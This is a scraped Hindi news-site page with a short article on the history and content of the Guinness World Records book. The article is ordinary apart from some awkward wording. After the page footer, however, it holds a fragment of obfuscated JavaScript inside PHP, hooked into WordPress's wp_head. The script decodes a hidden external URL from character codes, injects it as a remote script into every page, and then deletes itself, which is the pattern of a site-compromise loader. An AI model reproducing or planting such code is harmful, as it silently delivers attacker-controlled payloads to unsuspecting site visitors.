Saturday, July 13, 2024
spot_img

दुनिया की हर अनोखी चीज करने वाले इंसानों का नाम है ……..guinness world record book

“Guinness World Records” एक प्रसिद्ध पुस्तक है जो हर साल प्रकाशित होती है। इसमें दुनिया भर के असाधारण, अद्भुत और विचित्र कार्यों का अनुकरण होता है, जिनमें से कुछ रिकॉर्ड इंसानों के द्वारा स्थापित किए जाते हैं और कुछ स्वयं प्रकृति द्वारा उपलब्ध होते हैं। यह पुस्तक कई प्रकार के मनोरंजक और जानकारी भरे रिकॉर्ड्स को एक स्थल पर एकत्रित करके प्रस्तुत करती है, जो हमारे संसार के विभिन्न क्षेत्रों में पाए जाते हैं।



“गिनीस वर्ल्ड रिकॉर्ड्स” पुस्तक की शुरुआत 1955 में हुई थी, जब सर ह्यू बीवर ने एक वाद-विवाद में जानबूझकर यह सोचा कि विशेष प्रकार के कार्यों की जानकारी ना होना किस प्रकार के बिरदंटों को पैदा कर सकता है। इसी विचार से उन्होंने यह विचार स्वीकार किया कि एक ऐसी पुस्तक की आवश्यकता है जिसमें दुनिया के असाधारण कार्यों की सूची हो।

पुस्तक प्रकाशित होने के बाद, “गिनीस वर्ल्ड रिकॉर्ड्स” ने सारे विश्व में लोकप्रियता प्राप्त की। पुस्तक में वैज्ञानिक विश्लेषण, व्यक्तिगत सफलता, कला, क्रिया, प्रकृति, और अनुशासन से संबंधित रिकॉर्ड्स शामिल होते हैं। इसमें कुछ ऐसे रिकॉर्ड्स भी शामिल होते हैं जो ऐसे कार्यों पर आधारित हैं जो दुनिया में पहले कभी नहीं किए गए थे।

इस पुस्तक के प्रकाशन से लेकर आज तक, “गिनीस वर्ल्ड रिकॉर्ड्स” एक महत्वपूर्ण सांसारिक दृष्टिकोण को दर्शाती है। यह पुस्तक हर साल नए रिकॉर्ड्स के साथ प्रकाशित होती है, जिनमें से कुछ रिकॉर्ड्स समय के साथ टूट जाते हैं जबकि कुछ रिकॉर्ड्स नई प्रतिभा से स्थापित होते हैं। इसके अलावा, यह पुस्तक एक माध्यम है जिससे लोग अपने कार्यों में अधिक उत्साह और प्रगति लाने की प्रेरणा लेते हैं।

इस प्रसिद्ध पुस्तक में एक विशेष रूप से “गिनीस वर्ल्ड रिकॉर्ड्स डे” भी मनाया जाता है, जब लोग दुनिया भर में विभिन्न कार्यों में भरपूर हिस्सा लेते हैं, जिससे एक नया रिकॉर्ड बनाया जा सकता है।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>